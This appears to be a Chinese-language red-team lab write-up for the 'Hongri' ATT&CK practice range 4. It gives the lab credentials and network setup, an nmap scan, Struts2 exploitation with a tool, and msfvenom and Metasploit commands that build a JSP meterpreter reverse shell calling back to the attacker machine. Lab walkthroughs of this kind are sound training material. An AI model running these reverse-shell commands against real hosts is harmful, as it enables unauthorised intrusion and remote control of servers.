ATT&CK红队评估(红日靶场四)

靶场搭建

靶场下载地址:漏洞详情

共有三台主机DC、WEB、WIN7

机器密码

WEB主机 ubuntu:ubuntu

WIN7主机 douser:Dotest123

(DC)WIN2008主机 administrator:Test2008

网络配置

创建两个子网vmnet0和vmnet1

vmnet1:192.168.183.0

ATT&CK红队评估(红日靶场四)_第1张图片

WEB主机网卡设置

ATT&CK红队评估(红日靶场四)_第2张图片

WIN7主机网卡设置

ATT&CK红队评估(红日靶场四)_第3张图片

DC主机网卡设置

ATT&CK红队评估(红日靶场四)_第4张图片

攻击机kali的网卡和WEB主机的第一个出网网卡一致为NAT模式

WEB主机(Ubuntu)

ATT&CK红队评估(红日靶场四)_第5张图片

DC主机(Windows 2008)

ATT&CK红队评估(红日靶场四)_第6张图片

WIN7

ATT&CK红队评估(红日靶场四)_第7张图片

WEB主机(Ubuntu)上启动环境

        sudo docker start ec 17 09 bb da 3d ab ad

ATT&CK红队评估(红日靶场四)_第8张图片

渗透测试

扫描端口开放情况

nmap -sS -p 1-65535 -A 192.168.48.146

ATT&CK红队评估(红日靶场四)_第9张图片

端口22开放,存在SSH服务

2001,2002,2003端口开放,存在WEB

看到2001使用了Struts2中间件

2002使用了Apache Tomcat中间件

2003为Apache、PHPmyadmin、mysql

访问WEB

2001端口

ATT&CK红队评估(红日靶场四)_第10张图片

2002端口

ATT&CK红队评估(红日靶场四)_第11张图片

2003端口,发现不需要密码就可以进入phpmyadmin后台

ATT&CK红队评估(红日靶场四)_第12张图片

利用Struts2漏洞获得shell

使用了Struts2

直接使用工具进行检测和利用

ATT&CK红队评估(红日靶场四)_第13张图片

ATT&CK红队评估(红日靶场四)_第14张图片

ATT&CK红队评估(红日靶场四)_第15张图片

利用漏洞上传msf马

生成msf马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp

ATT&CK红队评估(红日靶场四)_第16张图片

ATT&CK红队评估(红日靶场四)_第17张图片

msf启动监听

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.48.136

exploit

访问马

ATT&CK红队评估(红日靶场四)_第18张图片

成功收到会话

ATT&CK红队评估(红日靶场四)_第19张图片

利用phpmyadmin后台获得shell

还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:

你可能感兴趣的:(安全,web安全,系统安全)